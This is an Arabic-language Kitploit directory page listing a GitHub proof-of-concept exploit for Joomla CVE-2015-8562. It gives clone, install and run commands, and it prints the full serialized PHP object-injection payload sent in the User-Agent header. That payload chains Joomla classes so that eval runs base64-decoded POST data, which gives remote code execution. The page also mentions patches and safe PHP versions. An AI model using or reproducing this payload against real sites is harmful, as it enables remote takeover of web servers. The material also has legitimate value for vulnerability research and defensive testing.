Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Joomla-CVE-2015-8562-PHP-POC — إثبات مفهوم لثغرة CVE-2015-8562 في Joomla | Kitploit
أدوات/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

إثبات مفهوم لثغرة CVE-2015-8562 في Joomla

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 10 سنواتلم تتم المراجعة بعد

Joomla-CVE-2015-8562-PHP-POC

دليل إثبات لثغرة CVE-2015-8562 في Joomla

Preview

مقدمة

هذا الدليل هو نسخة شبه مطابقة لتطبيق Gary بلغة Python المستضاف على exploit-db.

استخدامه

من السهل جداً تثبيته:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

بعد أن يقوم composer بتثبيت كل شيء، ستحتاج إلى تغيير $target في exploit.php.

بعد ذلك ستكون جاهزاً للانطلاق:

root@kitploit:~
php exploit.php

CVE-2015-8562

في ديسمبر 2015، تم اكتشاف ثغرة في Joomla. تسمح للمهاجمين عن بعد بتنفيذ هجمات حقن كائنات PHP وتنفيذ كود PHP عشوائي عبر رأس HTTP User-Agent.

أثرت هذه الثغرة على جميع إصدارات Joomla. تم إطلاق تصحيح للإصدارات v1.5.x و v2.5x و v3.x بالفعل هنا.

إذا كنت تستخدم PHP >= 5.4.45 أو >= 5.5.29 أو >= 5.6.13 فأنت بأمان، لأن هذا الاستغلال يستخدم أيضاً CVE-2015-6835.

قام Nikos Verschore من PatrolServer بكتابة تدوينة مفصلة جداً وكان له دور كبير في فهم هذه الثغرة. يمكنك استخدام الماسح المصغر الخاص بهم مجاناً للتحقق مما إذا كان موقعك معرضاً للخطر.

الاستغلال الفعلي

هذا ما يبدو عليه رأس User-Agent المرسل:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
تنزيل الأداة